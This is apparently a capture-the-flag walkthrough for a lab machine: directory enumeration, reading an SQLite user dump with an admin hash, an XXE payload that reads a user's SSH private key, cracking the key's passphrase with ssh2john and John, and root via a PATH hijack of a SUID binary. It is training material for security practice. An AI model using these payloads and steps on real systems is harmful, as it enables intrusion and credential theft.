Once we have the credentials, we can use them to login to the admin page a port 8765. At this page we can "Add a comment on the website". If we inspect the Source code of the site we find the following.
This gives us three pieces of valuable information
Someone called Barry can login with his SSH
We must perform an XXE attack as we can pass XML to the submit form.
The path /auth/dontforget.bak looks interesting
If we start from the bottom, we can download the dontforget.bak file and view its content using the cat command.
This gives us the basic XML form we need to provide. We can combine it with a XXE payload to view the id_rsa key of Barry.
id_rsa
Once the id_rsa is obtained we can try to login with SSH as Barry - remember to modify the permissions of the key chmod 600 id_rsa
However, we are prompted for a password which is not the same we used to login to the admin page.
Obtain the password with John
We can use ssh2john and JohnTheRipper to crack the password.
First, convert the key to right format then use John to crack it.
Get first flag
Once we have logged in a Barry, we can get the first flag by viewing the file /home/barry/user.txt
Get root
Now, we start by looking SUIDs with the command find / -perm -u=s -type f 2>/dev/null
which shows us that we can execute /home/joe/live_log as root.
If we use strings on that file, we find this interesting snippet.
tail -f /var/log/nginx/access.log
This seems to be a command that is executed. The proper way of doing this is probally some reverse engineering, but since we kinda know what to look for this is sufficient.
Let's try to create a custom tail binary and try to hijack the path. The content of tail should look like this. A Bash script that will copy /bin/bash to the /tmp folder and set the correct privileges.
Next, we modify the PATH variable and execute the log file.
If everything was successful, we can now obtain a shell with root privileges by executing /tmp/bash -p
We can verify that we have root privileges with the id command.
gobuster dir -u $IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "php, txt" | tee gobuster.log
file users.bak
users.bak: SQLite 3.x database, last written using SQLite version 3034001, file counter 2, database pages 2, cookie 0x1, schema 4, UTF-8, version-valid-for 2
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> SELECT * FROM users;
admin|1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
<script type="text/javascript">
//document.cookie = "Example=/auth/dontforget.bak";
function checktarea() {
let tbox = document.getElementById("box").value;
if (tbox == null || tbox.length == 0) {
alert("Insert XML Code!")
}
}
</script>
</head>
<body>
<!-- Barry, you can now SSH in using your key!-->
cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///home/barry/.ssh/id_rsa" >]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
ssh barry@$IP -i id_rsa
ssh2john id_rsa > barryhash
john barryhash --wordlist=/usr/share/wordlists/rockyou.txt